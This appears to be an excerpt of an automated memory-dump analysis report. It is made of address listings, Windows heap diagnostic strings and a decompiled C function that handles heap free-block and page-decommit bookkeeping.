                                  0x019547a2
                                  0x019547a4
                                  0x01954830
                                  0x01954833
                                  0x01954879
                                  0x0195487d
                                  0x019548f1
                                  0x019548f3
                                  0x019548f3
                                  0x00000000
                                  0x019548f3
                                  0x0195487f
                                  0x01954885
                                  0x01954887
                                  0x019548a8
                                  0x019548a8
                                  0x019548ae
                                  0x019548b0
                                  0x019548dc
                                  0x019548dc
                                  0x019548dc
                                  0x019548dc
                                  0x019548ec
                                  0x00000000
                                  0x019548ec
                                  0x019548b2
                                  0x019548bc
                                  0x019548be
                                  0x019548c1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x019548c3
                                  0x019548c3
                                  0x019548c6
                                  0x019548c9
                                  0x019548cc
                                  0x019548d1
                                  0x019548d4
                                  0x00000000
                                  0x00000000
                                  0x019548d6
                                  0x019548d7
                                  0x019548da
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x019548da
                                  0x0195494f
                                  0x01954955
                                  0x01954959
                                  0x01954978
                                  0x0195497d
                                  0x0195495b
                                  0x01954970
                                  0x01954975
                                  0x01954986
                                  0x01954987
                                  0x0195498a
                                  0x0195498d
                                  0x01954997
                                  0x019547ef
                                  0x019547ef
                                  0x019547ef
                                  0x00000000
                                  0x019547ef
                                  0x01954890
                                  0x01954890
                                  0x01954891
                                  0x01954891
                                  0x01954894
                                  0x01954897
                                  0x0195489d
                                  0x019548a0
                                  0x00000000
                                  0x00000000
                                  0x019548a2
                                  0x019548a3
                                  0x019548a6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x019548a6
                                  0x019548fb
                                  0x01954901
                                  0x01954905
                                  0x01954924
                                  0x01954929
                                  0x01954907
                                  0x0195491c
                                  0x01954921
                                  0x0195492f
                                  0x01954935
                                  0x01954936
                                  0x01954939
                                  0x01954942
                                  0x00000000
                                  0x01954947
                                  0x01954835
                                  0x0195483b
                                  0x0195483f
                                  0x0195485e
                                  0x01954863
                                  0x01954841
                                  0x01954856
                                  0x0195485b
                                  0x01954869
                                  0x0195486c
                                  0x0195486f
                                  0x019547e7
                                  0x019547e7
                                  0x00000000
                                  0x019547ec
                                  0x019547aa
                                  0x019547b0
                                  0x019547b4
                                  0x019547d3
                                  0x019547d8
                                  0x019547b6
                                  0x019547cb
                                  0x019547d0
                                  0x019547de
                                  0x019547df
                                  0x019547e2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0195476f
                                  0x0195476f
                                  0x01954778
                                  0x01954785
                                  0x01954787
                                  0x0195478c
                                  0x0195478e
                                  0x00000000
                                  0x00000000
                                  0x01954790
                                  0x01954792
                                  0x01954794
                                  0x00000000
                                  0x00000000
                                  0x01954796
                                  0x01954799
                                  0x00000000
                                  0x01954799
                                  0x00000000
                                  0x019545c3
                                  0x019545c3
                                  0x019545c7
                                  0x019545c7
                                  0x019545ca
                                  0x019545cf
                                  0x019545d3
                                  0x019545df
                                  0x019545e4
                                  0x019545e6
                                  0x019545e8
                                  0x019545ed
                                  0x019545ed
                                  0x019545f2
                                  0x019545f2
                                  0x019545f7
                                  0x019545fc
                                  0x01954602
                                  0x01954606
                                  0x01954609
                                  0x0195460f
                                  0x019546de
                                  0x019546e3
                                  0x019546e5
                                  0x019546ec
                                  0x019546ee
                                  0x019546f6
                                  0x019546f6
                                  0x019546f6
                                  0x019546f6
                                  0x019546ec
                                  0x01954615
                                  0x01954615
                                  0x0195461d
                                  0x0195462e
                                  0x0195462e
                                  0x0195461d
                                  0x0195460f
                                  0x01954609
                                  0x019546fd
                                  0x00000000
                                  0x00000000
                                  0x01954710
                                  0x0195471a
                                  0x01954720
                                  0x01954720
                                  0x01954722
                                  0x0195472c
                                  0x00000000
                                  0x0195472e
                                  0x0195472e
                                  0x00000000
                                  0x0195472e
                                  0x0195472c
                                  0x01954738
                                  0x0195473c
                                  0x0195474b
                                  0x01954751
                                  0x01954751
                                  0x00000000
                                  0x0195473c
                                  0x019548f4
                                  0x019548f4
                                  0x00000000
                                  0x019548f4

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                  • API String ID: 0-1357697941
                                  • Opcode ID: 4270267dfbcbf709164241492e2ea3565b4920929a104dca31f31fd2e116c7a0
                                  • Instruction ID: 6befba98715a5ef4ac2f7e312b2427a66678ba574282be7073fa8d718cb1dcd0
                                  • Opcode Fuzzy Hash: 4270267dfbcbf709164241492e2ea3565b4920929a104dca31f31fd2e116c7a0
                                  • Instruction Fuzzy Hash: AAF15530600646EFDBA1DF69C480FAABBF5FF05704F188429EA4AE7241E774E685CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018BA309, Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E018BA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x1988a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E018BA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E018BDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E01899373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E0189A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x1988748 - 1;
						if( *0x1988748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E0189B150();
								} else {
									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0189B150();
								__eflags =  *0x1987bc8;
								if( *0x1987bc8 == 0) {
									__eflags = 1;
									E01952073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x1988748 - 1;
							if( *0x1988748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E018C174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E018B7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E019514FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E01899373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E01899819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x1988748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E0189B150();
											} else {
												E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E0189B150();
											_pop(_t491);
											__eflags =  *0x1987bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01952073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0195A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E018BA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E018B7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E018B7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01951411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E018B7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E018B7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x1988748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E0189B150();
							} else {
								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E0189B150();
							__eflags =  *0x1987bc8;
							if( *0x1987bc8 == 0) {
								__eflags = 0;
								E01952073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x1988748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E0189B150();
												} else {
													E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E0189B150();
												__eflags =  *0x1987bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01952073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0195A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E018BA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E018BB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E018BA830(_t553, _v64, _v24);
								_t286 = E018B7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E018B7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01951411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E018B7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E018B7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01951411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E018C174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E018BB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E018B7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E019514FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E018B99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E018BA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E018CABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                  0x018ba309
                                  0x018ba316
                                  0x018ba319
                                  0x018ba31d
                                  0x018ba32d
                                  0x018ba331
                                  0x01901e0d
                                  0x01901e10
                                  0x018ba3cb
                                  0x018ba3cb
                                  0x018ba3bd
                                  0x018ba3c3
                                  0x018ba3c3
                                  0x018ba33a
                                  0x01901e17
                                  0x01901e1b
                                  0x01901e1d
                                  0x01901e2f
                                  0x01901e34
                                  0x01901e36
                                  0x01901e3c
                                  0x01901e3c
                                  0x01901e3c
                                  0x01901e3c
                                  0x01901e36
                                  0x01901e42
                                  0x01901e45
                                  0x01901e47
                                  0x018ba3f8
                                  0x018ba3f8
                                  0x018ba3fb
                                  0x018ba3fd
                                  0x01901e50
                                  0x018ba403
                                  0x018ba411
                                  0x018ba411
                                  0x018ba411
                                  0x018ba41e
                                  0x018ba420
                                  0x018ba424
                                  0x018ba427
                                  0x018ba7c9
                                  0x018ba7cd
                                  0x018ba7d2
                                  0x018ba7d9
                                  0x018ba7e0
                                  0x018ba7e3
                                  0x018ba7ed
                                  0x018ba7f3
                                  0x018ba7f9
                                  0x018ba7ff
                                  0x018ba802
                                  0x018ba807
                                  0x018ba809
                                  0x018ba809
                                  0x018ba809
                                  0x018ba80f
                                  0x018ba80f
                                  0x018ba812
                                  0x018ba81c
                                  0x018ba821
                                  0x018ba824
                                  0x018ba42d
                                  0x018ba42d
                                  0x018ba42d
                                  0x018ba42d
                                  0x018ba42d
                                  0x018ba436
                                  0x018ba43a
                                  0x018ba609
                                  0x018ba60d
                                  0x018ba612
                                  0x018ba616
                                  0x018ba61a
                                  0x01901e57
                                  0x01901e59
                                  0x00000000
                                  0x00000000
                                  0x01901e5f
                                  0x018ba620
                                  0x018ba627
                                  0x01901e64
                                  0x01901e66
                                  0x01901e6c
                                  0x01901e72
                                  0x01901e76
                                  0x01901e95
                                  0x01901e9a
                                  0x01901e78
                                  0x01901e8d
                                  0x01901e92
                                  0x01901ea0
                                  0x01901ea5
                                  0x01901eaa
                                  0x01901eb2
                                  0x01901eb6
                                  0x01901eb9
                                  0x01901eb9
                                  0x01901ebe
                                  0x01901ec2
                                  0x01901ec2
                                  0x01901e66
                                  0x018ba62d
                                  0x018ba633
                                  0x018ba636
                                  0x018ba63a
                                  0x018ba63c
                                  0x018ba640
                                  0x018ba642
                                  0x018ba644
                                  0x018ba644
                                  0x018ba644
                                  0x018ba64d
                                  0x018ba64d
                                  0x018ba651
                                  0x018ba655
                                  0x01901eca
                                  0x01901ed1
                                  0x00000000
                                  0x00000000
                                  0x01901ed7
                                  0x00000000
                                  0x018ba65b
                                  0x018ba669
                                  0x018ba66e
                                  0x018ba670
                                  0x00000000
                                  0x00000000
                                  0x018ba676
                                  0x018ba67b
                                  0x018ba680
                                  0x018ba682
                                  0x01901f1a
                                  0x018ba688
                                  0x018ba688
                                  0x018ba688
                                  0x018ba68a
                                  0x018ba68d
                                  0x01901f24
                                  0x01901f2a
                                  0x01901f31
                                  0x01901f43
                                  0x01901f43
                                  0x01901f31
                                  0x018ba693
                                  0x018ba697
                                  0x018ba69d
                                  0x018ba6a0
                                  0x018ba6a6
                                  0x018ba6a8
                                  0x018ba6a8
                                  0x018ba6a8
                                  0x018ba6a8
                                  0x018ba6b2
                                  0x018ba6b7
                                  0x018ba6c1
                                  0x018ba6c6
                                  0x018ba6d2
                                  0x018ba6d9
                                  0x018ba6e3
                                  0x018ba6e6
                                  0x018ba6eb
                                  0x018ba6ed
                                  0x018ba6ed
                                  0x018ba6ed
                                  0x018ba6ed
                                  0x018ba6f3
                                  0x018ba6f8
                                  0x018ba702
                                  0x018ba70a
                                  0x018ba70e
                                  0x018ba71a
                                  0x018ba71e
                                  0x01901fcb
                                  0x01901fcf
                                  0x01901fdd
                                  0x01901fe3
                                  0x01901fe3
                                  0x018ba724
                                  0x018ba728
                                  0x018ba72a
                                  0x018ba72d
                                  0x018ba737
                                  0x018ba73a
                                  0x018ba73c
                                  0x018ba742
                                  0x018ba748
                                  0x01901f4d
                                  0x01901f50
                                  0x01901f56
                                  0x01901f5c
                                  0x01901f5f
                                  0x01901f7e
                                  0x01901f83
                                  0x01901f61
                                  0x01901f76
                                  0x01901f7b
                                  0x01901f89
                                  0x01901f8e
                                  0x01901f93
                                  0x01901f94
                                  0x01901f9a
                                  0x01901f9c
                                  0x01901f9e
                                  0x01901fa1
                                  0x01901fa1
                                  0x01901fa6
                                  0x01901fa6
                                  0x01901f50
                                  0x018ba74e
                                  0x018ba751
                                  0x018ba754
                                  0x018ba75d
                                  0x018ba75e
                                  0x018ba762
                                  0x018ba767
                                  0x01901faf
                                  0x01901fb0
                                  0x01901fb9
                                  0x01901fbe
                                  0x01901fc2
                                  0x01901fc2
                                  0x018ba76d
                                  0x018ba76d
                                  0x018ba775
                                  0x018ba778
                                  0x018ba77d
                                  0x018ba77d
                                  0x018ba71e
                                  0x018ba782
                                  0x018ba787
                                  0x018ba789
                                  0x01901ff3
                                  0x018ba78f
                                  0x018ba78f
                                  0x018ba78f
                                  0x018ba791
                                  0x018ba794
                                  0x01901ffd
                                  0x01902006
                                  0x0190200c
                                  0x01902017
                                  0x01902019
                                  0x01902024
                                  0x01902024
                                  0x01902024
                                  0x01902047
                                  0x01902047
                                  0x0190200c
                                  0x018ba79a
                                  0x018ba79f
                                  0x018ba7a4
                                  0x018ba7a9
                                  0x018ba7ab
                                  0x0190205a
                                  0x018ba7b1
                                  0x018ba7b1
                                  0x018ba7b1
                                  0x018ba7b3
                                  0x018ba7b6
                                  0x00000000
                                  0x018ba7bc
                                  0x01902066
                                  0x01902068
                                  0x01902073
                                  0x01902073
                                  0x01902073
                                  0x01902078
                                  0x01902079
                                  0x0190207d
                                  0x00000000
                                  0x0190207d
                                  0x018ba7b6
                                  0x018ba440
                                  0x018ba440
                                  0x018ba440
                                  0x018ba446
                                  0x018ba44c
                                  0x018ba44f
                                  0x018ba453
                                  0x018ba455
